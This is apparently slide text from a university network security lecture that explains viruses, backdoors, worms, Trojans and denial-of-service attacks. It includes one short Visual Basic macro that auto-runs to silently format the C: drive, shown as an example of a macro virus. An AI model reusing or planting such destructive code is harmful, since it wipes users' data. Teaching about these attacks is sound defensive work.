Network Security: Presented By: Dr. Munam Ali Shah
Network Security: Presented By: Dr. Munam Ali Shah
Lecture 5
security attacks
To identify and classify which security attacks leads to
8
An Example of Boot Sector Virus
Polymorphic Virus
Virus that has the ability to “change” its own code to
avoid detection by signature scanners
Macro Virus
Is based on a macro programming language of a
popular application (e.g. MS Word/Excel, etc.)
Stealth Virus
Virus that has the ability to hide its presence from the
user. The virus may maintain a copy of the original,
uninfected data and monitor system activity
10
Example of Macro Virus
Visual Basic Macro to reformat hard drive
Sub AutoOpen()
Dim oFS
Set oFS =
CreateObject(’’Scripting.FileSystemObject’’
)
vs = Shell(’’c:command.com /k format
c:’’,vbHide)
End Sub
Trap Door
Trap Door
Trap doors, also referred to as backdoors, are
bits of code embedded in programs by the
programmer(s) to quickly gain access at a later
time.
A programmer may purposely leaves this code in
or simply forgets to remove it, a potential security
hole is introduced. Hackers often plant a backdoor
on previously compromised systems to gain later
access
Worms
A Worm is a piece of software that uses computer
networks (and security flaws) to create copies of itself
First Worm in 1988: “Internet Worm“
propagated via exploitation of several BSD and sendmail-
bugs
infected large number of computers on the Internet
Some “successful“ Worms
Code Red in 2001
Infected hundreds of thousands of systems by exploiting a vulnerability in
Microsoft‘s Internet Information Server
Blaster in 2003
Infected hundreds of thousands of systems by exploiting a vulnerability in
Microsoft‘s RPC service
13
Trojan Horse
Trojan Horses
A Trojan is (non-self-replicating program) that appears to
perform a desirable function for the user but instead facilitates
unauthorized access to the user's computer system
It is embedded within or disguised as legitimate software
Trojans may look interesting to the unsuspecting user, but are
harmful when actually executed
Two types of Trojan Horses
Useful software that has been corrupted by an attacker to
execute malicious code when the program is run
Standalone program that masquerades as something else
(like a game, or a neat little utility) to trick the user into
running it
Trojan Horses do not operate autonomously
15
Types of Trojan Horses (1/2)
Data-Sending Trojans
Are used by attackers to gather certain data
Passwords
E-banking credentials
Gathered data is often transferred to a location on the
Internet where the attacker can harvest the data later
on
Destructive Trojans
Trojans that perform directly harmful activity
Altering data
Encrypting files
17
Phishing
18
Denial of Service (DoS) Attacks
19
Categories of Denial of Service Attacks
Stopping Exhausting
services resources
Attack Locally - Process killing - Forking process to
is - System fill process table
Launch reconfiguring - Filling up the file
system
Remotely - Malfunction - Packet flood (e.g.
packet attack SYN flood, Smurf )
20
DoS: Stopping Services (locally)
21
DoS: Exhausting Resources (Locally )
23
DoS: Exhausting Resources
(Remotely)
An attacker tries tying up all resources of the
target system (particularly the communications
link)
Popular example: SYN-Flood
During a SYN-Flood an attacker will send a lot of SYN
packets with a spoofed (and unresponsive) source
address to the target and never complete the
handshake to fill up the connection queue or the
communication link (and cause a DoS)
24
DDoS
DDoS attack terminology
Attacking machines are called daemons, slaves,
zombies or agents.
“Zombies” are usually poorly secured machines that
are exploited (Also called agents)
Machines that control and command the zombies are
called masters or handlers.
Attacker would like to hide trace: He hides himself
behind machines that are called stepping stones.
25
Great Programming Required?
Remember !!
The hackers and attackers are expert level
programmers
They now most of the programming concepts
They simply find the loopholes in the system to exploit
the opportunity to break-in the system.
To become resilient against threats and to know the
programming level of attackers, and to determine the
bug,
YES great programming is required.
Summary of today’s lecture
In today’s lecture, we discussed in detail about different
types of security attacks that a computer system is/can
be vulnerable to.
Our discussion included some famous attacks such as
virus, worms, DoS, Trojan horse etc.
Next lecture topics
We will have our discussion continued on DoS attacks.
We will see how DoS attacks can cost million of $$$$ to
a company
We will explore more types and sub-types of DoS
attacks.
The End